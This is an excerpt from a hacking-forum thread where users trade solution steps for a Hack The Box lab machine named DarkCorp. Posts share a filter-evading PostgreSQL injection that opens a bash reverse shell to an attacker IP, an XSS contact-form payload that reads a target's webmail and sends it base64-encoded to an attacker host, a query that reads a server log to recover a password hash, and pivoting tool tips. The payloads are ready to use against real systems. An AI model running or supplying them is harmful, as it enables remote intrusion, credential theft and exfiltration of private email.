DarkCorp Hack the Box Season 7 (Windows Insane)
by RedBlock - Saturday February 8, 2025 at 03:32 PM
#51
(02-09-2025, 12:06 AM)hijoxi6719 Wrote:
DO $$ DECLARE     c text; BEGIN     c := CHR(67) || CHR(79) || CHR(80) || CHR(89) ||         ' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1"''';     EXECUTE c; END $$;

Reverse shell via SQLi with "WAF" bypass

from search ?
 ...............................
Reply
#52
I have the flask secret key, but I am not able to generate the token to login to the dashboard. Found some files in drip.darkcorp.htb but nthg much to tell me what they expect in the flask token ...
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#53
(02-08-2025, 08:50 PM)4yhg5y72jffg820j3f Wrote: I think we have to craft an XSS payload that will return the contents of

http://mail.drip.htb/?_task=mail&_action...&_extwin=1

for the support engineer user

You're welcome:

POST /contact HTTP/1.1
Host: drip.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 485

name=RooT&email=root@drip.htb&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation%2Dname%3Aprogress%2Dbar%2Dstripes%20onanimationstart%3Dfetch%28%27%2F%3F%5Ftask%3Dmail%26%5Faction%3Dshow%26%5Fuid%3D2%26%5Fmbox%3DINBOX%26%5Fextwin%3D1%27%29%2Ethen%28r%3D%3Er%2Etext%28%29%29%2Ethen%28t%3D%3Efetch%28%60http%3A%2F%2F10%2E10%2E14%2EXX%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3E%0A%20%20Foo%0A%3C%2Fbody%3E&content=html&recipient=bcase@drip.htb

I only can read the first 3 emails. If I change the _uid= to anything higher then 3 I just get back a 
<div class="boxerror"><h3 class="error-title">SERVER ERROR!</h3><div class="error-text">Could not load message from server.</div></div>

What am I doing wrong? How can I read the email with pw reset token?

Edit:
Ok, got it. The mails get deleted and with spamming pw reset requests I was able to get a reset link with _uid=5
Reply
#54
''; SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 1000000);


MD5 hash at the beginning of the file corresponds to ebelford's SSH password.
Reply
#55
seems like the next step is to use the postgres user to port forward so you can access the windows machine:
172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb

Guest account is disabled.
Reply
#56
There is one more:

172.16.20.2 - WEB-01.darkcorp.htb
Reply
#57
(02-09-2025, 02:29 AM)4yhg5y72jffg820j3f Wrote: There is one more:

172.16.20.2 - WEB-01.darkcorp.htb

how did you find this one?
Reply
#58
(02-09-2025, 02:31 AM)jonklem Wrote:
(02-09-2025, 02:29 AM)4yhg5y72jffg820j3f Wrote: There is one more:

172.16.20.2 - WEB-01.darkcorp.htb

how did you find this one?

use fscan and ligolo-ng
Reply
#59
guys why nmap not work with proxychians i tried ssh also chisel ??
Reply
#60
Looked at my IPs (ip address) and guessed anything lower than mine...
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 22 9,275 06-25-2026, 02:15 PM
Last Post: hashxyz
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 7,456 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - VOLEUR.HTB - MEDIUM WINDOWS chain 1 6,652 02-09-2026, 07:07 PM
Last Post: 403Forbidden
  HTB - CERTIFICATE.HTB - HARD WINDOWS chain 0 2,861 02-09-2026, 04:49 PM
Last Post: chain
  Hack the Box FullHouse all 7 flags RedBlock 13 4,812 01-27-2026, 08:30 PM
Last Post: 00xx00



 Users browsing this thread: 1 Guest(s)